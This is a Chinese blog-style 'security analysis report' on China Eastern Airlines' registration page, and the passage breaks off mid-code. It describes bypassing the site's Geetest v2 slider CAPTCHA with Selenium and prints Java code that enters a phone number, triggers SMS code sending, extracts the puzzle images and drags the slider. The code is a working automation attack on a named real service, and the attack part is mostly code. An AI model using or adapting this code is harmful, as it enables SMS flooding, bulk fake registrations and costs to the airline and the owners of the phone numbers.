【 东方航空-注册安全分析报告】

前言
由于网站注册入口容易被黑客攻击，存在如下安全问题：

1. 暴力破解密码，造成用户信息泄露
2. 短信盗刷的安全问题，影响业务及导致用户投诉
3. 带来经济损失，尤其是后付费客户，风险巨大，造成亏损无底洞
   

所以大部分网站及App 都采取图形验证码或滑动验证码等交互解决方案， 但在机器学习能力提高的当下，连百度这样的大厂都遭受攻击导致点名批评， 图形验证及交互验证方式的安全性到底如何？ 请看具体分析

一、 东方航空PC 注册入口

简介：中国东方航空股份有限公司总部位于上海，是中国三大国有骨干航空公司之一，前身可追溯到1957年1月原民航上海管理处成立的第一支飞行中队，在上海、香港挂牌上市。
东航运营近800架飞机组成的现代化机队，是全球最年轻的机队之—，拥有中国规模最大、商业和技术模式领先的互联网宽体机队，在中国民航首家开放手机等便携式设备使用。“东方万里行”常旅客可享受联盟多家航空公司的会员权益及全球超过750间机场贵宾室。每年能为1.5亿人次提供航空出行服务，位居全球前十。

二、 安全性分析报告：

采用极验的V2版本，容易被模拟器绕过甚至逆向后暴力攻击，滑动拼图识别率在 95% 以上。

三、 测试方法：

前端界面分析， 采用的是极验2.0，最大特点就是将图片做分割后，在前端再做合并，这就好办了， 网上有大量现成的逆向文章及视频参考，不过我们这次不用逆向， 只是采用模拟器的方式，关键点主要模拟器交互、距离识别和轨道算法3部分。

1. 模拟器交互部分

public RetEntity send(WebDriver driver, String areaCode, String phone) {
   
		try {
   
			RetEntity retEntity = new RetEntity();
			driver.get(smsUrl);
			By phoneBy = By.xpath("//input[@placeholder='请输入手机号码']");
			WebElement phoneElemet = driver.findElement(phoneBy);
			phoneElemet.sendKeys(phone);
			driver.findElement(By.className("global-login-sendcode")).click();
			Thread.sleep(1000);
			boolean moveResult = geetApi.getAndMove(driver, 6);
			Thread.sleep(500);
			WebElement msgElement = ChromeDriverManager.waitElement(driver, By.className("global-login-sendcode-active"), 10);
			String msg = (msgElement != null) ? msgElement.getText() : null;
			if (moveResult && msg != null && msg.contains("s")) {
   
				retEntity.setRet(0);
				retEntity.setMsg(msg);
			} else {
   
				System.out.println("moveResult=" + moveResult + ",msg=" + msg);
			}
			return retEntity;
		} catch (Exception e) {
   
			System.out.println(e.toString());
			return null;
		}
	}


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

2. 获取滑动图片及调用移动交互

public boolean getAndMove(WebDriver driver, Integer offSet) {
   
		int distance = -1;
		try {
   
			WebElement moveElement = ChromeDriverManager.waitElement(driver, By.className("geetest_slider_button"), 1000);
			if (moveElement == null) {
   
				logger.error("getAndMove() moveElement=" + moveElement);
				return false;
			}

			// 下面的js代码根据canvas文档说明而来
			// 完整背景图geetest_canvas_fullbg geetest_fade geetest_absolute
			StringBuffer base64 = new StringBuffer();
			String fullName = "geetest_canvas_fullbg geetest_fade geetest_absolute";
			byte[] fullImg = GetImage.callJsByName(driver, fullName, base64);

			String bgName = "geetest_canvas_bg geetest_absolute";
			byte[] bgImg = GetImage.callJsByName(driver, bgName, base64);
			File fullFile = null, bgFile = null;
			if (fullImg != null && bgImg != null) {
   
				Long time = System.currentTimeMillis();

				fullFile = new File(dataPath + "geet/" + time + "full.png");
				FileUtils.writeByteArrayToFile(fullFile, fullImg);
				bgFile = new File(dataPath + "geet/" + time + "bg.png");
				FileUtils.writeByteArrayToFile(bgFile, bgImg);
				if (fullImg.length < 10000) {
   
					System.out.println("fullImg len=" + fullImg.length + " -> err[len<10000]");
					return false;
				}
			}
			// 获取滑动距离并删除图片
			distance = (fullFile != null && bgFile != null) ? ActionMove.getMoveDistance(fullFile.getAbsolutePath(), bgFile.getAbsolutePath()) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36